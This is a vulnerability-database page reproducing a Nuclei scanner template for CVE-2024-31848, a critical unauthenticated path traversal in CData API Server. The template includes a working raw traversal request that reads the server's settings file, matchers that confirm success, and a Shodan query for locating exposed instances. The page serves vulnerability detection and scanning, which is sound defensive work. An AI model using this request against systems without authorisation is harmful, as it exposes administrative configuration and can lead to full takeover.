Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2024-31848
HistoryMay 08, 2024 - 12:29 a.m.

CData API Server < 23.4.8844 - Path Traversal

2024-05-0800:29:24
ProjectDiscovery
github.com
41
cve
cdata
lfi
path traversal
java
embedded jetty
unauthenticated remote attacker
administrative access
http
response
body
status

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.7

Confidence

High

EPSS

0.013

Percentile

85.7%

A path traversal vulnerability exists in the Java version of CData API Server &lt; 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.
id: CVE-2024-31848

info:
  name: CData API Server < 23.4.8844 - Path Traversal
  author: pussycat0x
  severity: critical
  description: |
    A path traversal vulnerability exists in the Java version of CData API Server < 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31848
    - https://github.com/Stuub/CVE-2024-31848-PoC/blob/main/CVE-2024-31848.py
    - https://www.tenable.com/cve/CVE-2024-31848
    - https://www.tenable.com/security/research/tra-2024-09
    - https://github.com/Stuub/CVE-2024-31848-PoC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-31848
    cwe-id: CWE-22
    epss-score: 0.00054
    epss-percentile: 0.21518
  metadata:
    verified: true
    max-request: 2
    shodan-query: "title:\"CData - API Server\""
  tags: cve,cve2024,cdata,lfi
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - '{{BaseURL}}/login.rst'

    matchers:
      - type: word
        internal: true
        words:
          - '<title>CData - API Server</title>'

  - raw:
      - |
        GET /ui/..\src\getSettings.rsb?@json HTTP/1.1
        Host: {{Hostname}}
        Referer: {{RootURL}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"items":[{'
          - ':"true"'
          - 'notifyemail'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 490a0046304402202bba0b10fd785f68ccd28a5a844100e8774efb025416d9d1bc2ea8a8b8937d36022021998db80800ce9ef7ecaf3a5b1807731fb4531b4d0e6ed59f7a398324d6cf8c:922c64590222798bb761d5b6d8e72950

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.7

Confidence

High

EPSS

0.013

Percentile

85.7%